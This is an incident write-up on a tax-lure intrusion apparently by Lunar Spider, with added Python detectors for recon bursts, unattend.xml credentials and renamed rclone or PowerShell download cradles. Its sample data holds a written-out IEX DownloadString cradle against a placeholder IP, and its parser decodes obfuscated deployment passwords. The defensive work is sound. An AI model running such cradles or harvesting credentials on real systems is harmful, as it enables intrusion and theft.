W-9 Lure Kicks Off 28-Day Intrusion Ending in Exfiltration With No Ransomware
In May 2024, The DFIR Report documented an intrusion that began with a tax-themed lure and unfolded intermittently over nearly two months, with concentrated hands-on activity spanning roughly 28 days. Initial access traced to a malicious JavaScript “W-9” file that kicked off a multi-stage payload chain and set the tone for a patient, return-and-resume operation. Based on historical use of that JavaScript file, the intrusion is likely associated with the Lunar Spider threat group. Across the window of activity, the operators pursued credential theft, lateral movement, and data theft, testing multiple access avenues and re-tooling when needed. Despite the breadth of access and the use of multiple frameworks, the investigation notes no ransomware detonation at the end of the operation; instead, the actors were evicted from the network. As The DFIR Report puts it, the case shows how a single click can seed “a near two-month intrusion,” even when the most destructive endgame never materializes.
Day 1 (about six hours and eight minutes of activity) began when a user executed a JavaScript downloader that fetched an MSI, which in turn loaded a DLL (“upfilles.dll”) associated with Brute Ratel and set a Run key for persistence. A second loader established command-and-control (C2) and injected into “explorer.exe,” after which discovery started quickly through native commands: “ipconfig /all,” “systeminfo,” “nltest /domain_trusts,” “nltest /domain_trusts /all_trusts,” “net view /all /domain,” “net view /all,” “net group "Domain Admins" /domain,” “net config workstation,” a WMI query for installed AV via “wmic.exe,” and “whoami /groups.” The DFIR Report also observed follow-on beaconing and the use of a backconnect/VNC channel for interactive browsing and file staging. Persistence and discovery were paired with process injection to keep the activity blended with ordinary user-mode programs. By the end of the first day, the operators had firmly established their foothold, relying on living-off-the-land binaries and staging additional payloads for later use.
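The Day 1 discovery burst is a good detection opportunity because the individual commands are all legitimate admin tools; what is unusual is the number of distinct reconnaissance categories fired from one host and account within a few minutes. The following is an added example, not code from The DFIR Report or the intrusion: it classifies process-creation command lines into the recon categories listed above (stripping a leading `cmd.exe /c` wrapper and image path first) and raises one alert per host/user pair that crosses a category threshold inside a sliding window. The telemetry, host names, users and timestamps are constructed for the example; the threshold and window are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Recon commands from the Day 1 narrative, grouped into categories so that
# variants (e.g. both nltest /domain_trusts forms) count as one category.
DISCOVERY_PATTERNS = {
    "host_config":   re.compile(r"^ipconfig(\.exe)?\s+/all\b", re.I),
    "host_info":     re.compile(r"^systeminfo(\.exe)?\b", re.I),
    "domain_trusts": re.compile(r"^nltest(\.exe)?\s+/domain_trusts\b", re.I),
    "net_view":      re.compile(r"^net1?(\.exe)?\s+view\b", re.I),
    "priv_groups":   re.compile(r'^net1?(\.exe)?\s+group\s+"?domain admins"?', re.I),
    "workstation":   re.compile(r"^net1?(\.exe)?\s+config\s+workstation\b", re.I),
    "av_query":      re.compile(r"^wmic(\.exe)?\s+.*antivirusproduct", re.I),
    "whoami_groups": re.compile(r"^whoami(\.exe)?\s+/groups\b", re.I),
}

# Optional "C:\...\cmd.exe /c " prefix that wraps commands launched from an injected shell.
CMD_PREFIX = re.compile(r'^(?:"?[a-z]:\\[^"]*?\\)?cmd(?:\.exe)?"?\s+/[ck]\s+', re.I)


def normalize(cmdline):
    """Drop a cmd.exe /c wrapper, the image directory, and quotes so patterns can anchor at ^."""
    cmd = CMD_PREFIX.sub("", cmdline.strip())
    cmd = re.sub(r'^"?[a-z]:\\[^"\s]*\\', "", cmd, flags=re.I)  # C:\Windows\System32\whoami.exe -> whoami.exe
    return cmd.replace('"', "")


def classify(cmdline):
    """Return the discovery category a command line falls into, or None for anything else."""
    cmd = normalize(cmdline)
    for name, pattern in DISCOVERY_PATTERNS.items():
        if pattern.search(cmd):
            return name
    return None


def find_discovery_bursts(events, window=timedelta(minutes=10), min_categories=4):
    """Group events by (host, user); alert once per actor that runs >= min_categories
    distinct recon categories within `window`. Events carry ts (ISO 8601), host, user, cmdline."""
    by_actor = defaultdict(list)
    for ev in events:
        category = classify(ev["cmdline"])
        if category:
            by_actor[(ev["host"], ev["user"])].append((datetime.fromisoformat(ev["ts"]), category))
    alerts = []
    for (host, user), hits in by_actor.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):  # slide the window over each hit as a start point
            categories = {c for t, c in hits[i:] if t - start <= window}
            if len(categories) >= min_categories:
                alerts.append({"host": host, "user": user,
                               "first_seen": start.isoformat(), "categories": sorted(categories)})
                break  # one alert per actor is enough
    return alerts


# Constructed sample telemetry (not from the report), shaped like a SIEM export.
SAMPLE_EVENTS = [
    {"ts": "2024-03-01T14:02:11", "host": "WS01", "user": "CORP\\jdoe", "cmdline": r"C:\Windows\System32\cmd.exe /c ipconfig /all"},
    {"ts": "2024-03-01T14:02:40", "host": "WS01", "user": "CORP\\jdoe", "cmdline": "systeminfo"},
    {"ts": "2024-03-01T14:03:05", "host": "WS01", "user": "CORP\\jdoe", "cmdline": "nltest /domain_trusts"},
    {"ts": "2024-03-01T14:03:09", "host": "WS01", "user": "CORP\\jdoe", "cmdline": "nltest /domain_trusts /all_trusts"},
    {"ts": "2024-03-01T14:03:30", "host": "WS01", "user": "CORP\\jdoe", "cmdline": "net view /all /domain"},
    {"ts": "2024-03-01T14:04:02", "host": "WS01", "user": "CORP\\jdoe", "cmdline": 'net group "Domain Admins" /domain'},
    {"ts": "2024-03-01T14:04:40", "host": "WS01", "user": "CORP\\jdoe", "cmdline": r"wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName"},
    {"ts": "2024-03-01T14:05:10", "host": "WS01", "user": "CORP\\jdoe", "cmdline": r"C:\Windows\System32\whoami.exe /groups"},
    # Help-desk admin: two recon-looking commands 45 minutes apart must not alert.
    {"ts": "2024-03-01T09:00:00", "host": "SRV02", "user": "CORP\\helpdesk", "cmdline": "ipconfig /all"},
    {"ts": "2024-03-01T09:45:00", "host": "SRV02", "user": "CORP\\helpdesk", "cmdline": "whoami /groups"},
    {"ts": "2024-03-01T09:46:00", "host": "SRV02", "user": "CORP\\helpdesk", "cmdline": r"notepad.exe C:\Users\helpdesk\notes.txt"},
]

if __name__ == "__main__":
    for alert in find_discovery_bursts(SAMPLE_EVENTS):
        print(alert)
```

The category map matters more than the regexes: counting distinct categories rather than raw commands keeps a single admin who runs `ipconfig /all` twice from tripping the rule, while the injected-shell sequence on Day 1 hits seven categories in three minutes.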
Day 3 contained two brief actions separated by more than nine hours, but yielded a pivotal escalation source: an “unattend.xml” answer file “containing plaintext domain administrator credentials left over from an automated deployment process. This provided the threat actor with immediate high-privilege access to the domain environment,” The DFIR Report writes. Day 4 then delivered the heaviest activity (nearly nine hours). A Cobalt Strike DLL landed under “C:\ProgramData” and ran via “rundll32” (e.g., “rundll32 cron801.dl_,lvQkzdrFdILT”), with “rundll32” subsequently injecting into “sihost.exe” and “explorer.exe” (corroborated by CreateRemoteThread telemetry). From an injected context, “gpupdate.exe” accessed LSASS for credential material, while Active Directory discovery expanded with AdFind and additional built-in commands. Lateral movement progressed through “PsExec,” a “Backconnect” retrieval, and a scheduled task for persistence, alongside a UAC bypass that hijacked the “ms-settings” protocol handler and launched the auto-elevating “ComputerDefaults.exe” to run PowerShell without a prompt. Later that same day, the actors executed a custom Zerologon tool (“zero.exe”) to abuse CVE-2020-1472 and press deeper into domain infrastructure.
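The unattend.xml finding is the cheapest thing in this timeline to check for proactively. An answer file can carry credentials in three shapes: a bare `<Password>` under the domain-join `<Credentials>` block, a `<Password>` or `<AdministratorPassword>` with `<Value>` and `<PlainText>true</PlainText>`, and the so-called obfuscated form where `<PlainText>` is false and `<Value>` holds base64 of the UTF-16LE password with the literal string `Password` appended. The report only mentions the plaintext case; the added example below (my code, not The DFIR Report's) handles all three so a sweep of deployment shares and leftover `C:\Windows\Panther` copies does not miss the encoded variant. The sample answer file, account names and passwords are constructed for the example.

```python
import base64
import xml.etree.ElementTree as ET

# With <PlainText>false</PlainText>, Windows stores base64(UTF-16LE(password + "Password")).
OBFUSCATION_SUFFIX = "Password"


def _local(tag):
    """Strip the urn:schemas-microsoft-com:unattend namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def decode_unattend_password(value, plaintext):
    """Recover the password from a <Value> element given its <PlainText> flag."""
    if plaintext:
        return value
    decoded = base64.b64decode(value).decode("utf-16-le")
    if decoded.endswith(OBFUSCATION_SUFFIX):
        decoded = decoded[:-len(OBFUSCATION_SUFFIX)]
    return decoded


def find_unattend_credentials(xml_text):
    """Return every credential the answer file exposes, with the account and section it belongs to."""
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name not in ("Password", "AdministratorPassword"):
            continue
        children = {_local(c.tag): (c.text or "").strip() for c in elem}
        if "Value" in children:                        # <Password><Value/><PlainText/></Password>
            plaintext = children.get("PlainText", "true").lower() != "false"
            secret = decode_unattend_password(children["Value"], plaintext)
        elif (elem.text or "").strip():                # bare <Password>...</Password> (domain join)
            plaintext, secret = True, elem.text.strip()
        else:
            continue
        parent = parent_of[elem]
        siblings = {_local(c.tag): (c.text or "").strip() for c in parent}
        if name == "AdministratorPassword":
            account = "Administrator"                   # built-in local admin, no Username sibling
        else:
            account = siblings.get("Username") or siblings.get("Name") or "?"
        findings.append({
            "section": _local(parent.tag),
            "account": account,
            "domain": siblings.get("Domain", ""),
            "obfuscated": not plaintext,
            "secret": secret,
        })
    return findings


def _obfuscate(password):
    """Produce the PlainText=false encoding; used only to build the constructed sample below."""
    return base64.b64encode((password + OBFUSCATION_SUFFIX).encode("utf-16-le")).decode()


# Constructed sample answer file (not the one from the intrusion); every value is made up.
SAMPLE_UNATTEND = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="specialize">
    <component name="Microsoft-Windows-UnattendedJoin">
      <Identification>
        <Credentials>
          <Domain>corp.example</Domain>
          <Password>Winter2024!</Password>
          <Username>svc_deploy</Username>
        </Credentials>
        <JoinDomain>corp.example</JoinDomain>
      </Identification>
    </component>
  </settings>
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>{_obfuscate("Summer2024!")}</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>Admin123!</Value>
          <PlainText>true</PlainText>
        </AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""

if __name__ == "__main__":
    for finding in find_unattend_credentials(SAMPLE_UNATTEND):
        print(finding)
```

Run it against every unattend.xml, autounattend.xml and sysprep.inf-era leftover you can find on deployment shares and in `C:\Windows\Panther`; any hit for a domain account is a credential that needs rotating, not just a file to delete, because the password may already have been read.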
On Day 5 (03:39–04:03 UTC, then a pause until 16:50 UTC), the operators used RDP from the beachhead to a server, dropped a new Cobalt Strike beacon, and repeated the pattern on a file share host, then refreshed persistence with a new Brute Ratel DLL under the Run key. Activity then went quiet for two weeks. On Day 19, a renamed “badger” DLL (the Brute Ratel agent) re-established local persistence; on Day 20, a renamed “rclone” binary, its configuration file, and a simple batch/VBScript wrapper were introduced on the file server to automate exfiltration. The toolkit synchronized staged data to attacker-controlled infrastructure and ran for almost ten hours, while the operators filtered by file type, size, and age to maximize value and throughput. Throughout these phases, repeated PowerShell download-and-execute patterns (e.g., “IEX (New-Object Net.WebClient).DownloadString(...)”) appeared, matching the operation’s preference for in-memory staging and short-lived artifacts. The DFIR Report attributes the cadence (recon, pause, lateral move, pause, then exfil) to a crew comfortable leaving long-lived beacons and returning when conditions favored progress.
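Renaming rclone defeats an image-name rule but not the command line: the subcommand, the remote syntax (`name:path`) and rclone's distinctive long flags survive the rename, and the `--include`/`--max-age`/`--min-size` filters the operators tuned are exactly what an analyst wants pulled out of the event. The following is an added example, not code from the report or from rclone: it fingerprints a process command line by scoring those features, extracts the filter set, and separately flags the `IEX ... DownloadString` cradle mentioned above. The command lines, paths, remote name and IP address are constructed; the scoring threshold and flag list are my assumptions, not an rclone-documented signature.

```python
import re
import shlex

RCLONE_VERBS = {"copy", "sync", "move", "copyto", "ls", "lsd", "lsf", "lsjson", "config", "mount", "check"}
RCLONE_FLAGS = {"--config", "--transfers", "--checkers", "--bwlimit", "--progress", "-P",
                "--include", "--exclude", "--filter", "--max-age", "--min-age",
                "--max-size", "--min-size", "--ignore-existing", "--no-check-certificate",
                "--multi-thread-streams"}
FILTER_FLAGS = {"--include", "--exclude", "--filter", "--max-age", "--min-age", "--max-size", "--min-size"}
# rclone remote syntax "name:path". Requiring 2+ name characters rejects C:\ drive paths,
# and the lookahead rejects URLs such as http://...
REMOTE_RE = re.compile(r"^[A-Za-z0-9_-]{2,}:(?![\\/])\S*$")
DOWNLOAD_CRADLE_RE = re.compile(
    r"\b(iex|invoke-expression)\b.*?(downloadstring|downloaddata|invoke-webrequest|\biwr\b)", re.I)


def _image_name(token):
    return token.strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()


def fingerprint_rclone(cmdline):
    """Score a command line for rclone traits; return details if it looks like rclone, else None."""
    tokens = shlex.split(cmdline, posix=False)   # non-POSIX keeps Windows backslashes intact
    if not tokens:
        return None
    args = tokens[1:]
    verb = next((t.lower() for t in args if t.lower() in RCLONE_VERBS), None)
    flag_hits = {t.split("=", 1)[0] for t in args if t.startswith("-")} & RCLONE_FLAGS
    remotes = [t for t in args if REMOTE_RE.match(t)]
    score = int(verb is not None) + len(flag_hits) + int(bool(remotes))
    if score < 3:                                # assumed threshold: verb + remote + one flag, or similar
        return None
    filters = {}
    for i, tok in enumerate(args):               # collect --flag value and --flag=value forms
        flag, _, inline = tok.partition("=")
        if flag in FILTER_FLAGS:
            value = inline if inline else (args[i + 1] if i + 1 < len(args) else "")
            filters.setdefault(flag, []).append(value)
    image = _image_name(tokens[0])
    return {"image": image, "renamed": "rclone" not in image, "verb": verb,
            "remotes": remotes, "flags": sorted(flag_hits), "filters": filters}


def is_download_cradle(cmdline):
    """True for PowerShell download-and-execute one-liners of the IEX/DownloadString family."""
    return DOWNLOAD_CRADLE_RE.search(cmdline) is not None


def triage(cmdlines):
    """Return one finding per command line that fingerprints as rclone or as a download cradle."""
    findings = []
    for cmd in cmdlines:
        fp = fingerprint_rclone(cmd)
        if fp:
            findings.append({"type": "rclone", "detail": fp})
        if is_download_cradle(cmd):
            findings.append({"type": "download_cradle", "detail": cmd})
    return findings


# Constructed process-creation command lines (not from the report).
RENAMED_RCLONE_CMD = (r'C:\Windows\Temp\svchost.exe sync "\\FS01\Finance" remote:bucket/finance '
                      r'--include *.pdf --include *.xlsx --max-age 180d --min-size 10k '
                      r'--transfers 16 --config C:\Windows\Temp\r.conf')
CRADLE_CMD = r'''powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"'''
ROBOCOPY_CMD = r'robocopy.exe D:\Data \\BK01\Backup /MIR /R:1 /W:1'

if __name__ == "__main__":
    for finding in triage([RENAMED_RCLONE_CMD, CRADLE_CMD, ROBOCOPY_CMD]):
        print(finding)
```

The extracted `filters` dictionary is the part worth keeping in the alert: on Day 20 the age and size bounds tell you which data was targeted, and the `--config` path points at the rclone configuration file that names the attacker's remote.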
Late-stage actions consolidated credentials and mapped the remaining access paths. On Day 26 (13:58–16:07 UTC), injected processes returned to LSASS, and a PowerShell script (“Veeam-Get-Creds.ps1”) ran from an injected “spoolsv.exe” to extract stored backup credentials, reinforcing access to virtual infrastructure and protected data. Day 28 saw the download and execution of “rustscan,” which the operators used to enumerate SMB exposure across /16 and /8 ranges; they paired this with share reconnaissance via PowerView’s “Invoke-ShareFinder.” Lateral movement over the full operation relied on multiple channels: WMI remoting for attempted code execution, remote services with “PsExec” to distribute “system.dl_” to the domain controller, a file server, and a backup server, and the Zerologon utility for privilege manipulation and domain pivoting. The DFIR Report notes: “During the intrusion the threat actor used zero.exe to move laterally between devices in the network. The executable was executed on the beachhead host and targeted a second domain controller, overall it was executed eight different times with a different username being used every execution. The execution used remote services to run code on lateral hosts.” With credentials in hand, RDP became the preferred interactive channel. Ultimately, despite exfiltration and deep domain reach, no encryption operations followed; per The DFIR Report, the actors were removed from the environment, closing a campaign that showcased in-memory payload staging, staged credential harvesting, and measured data theft without a ransomware finale.
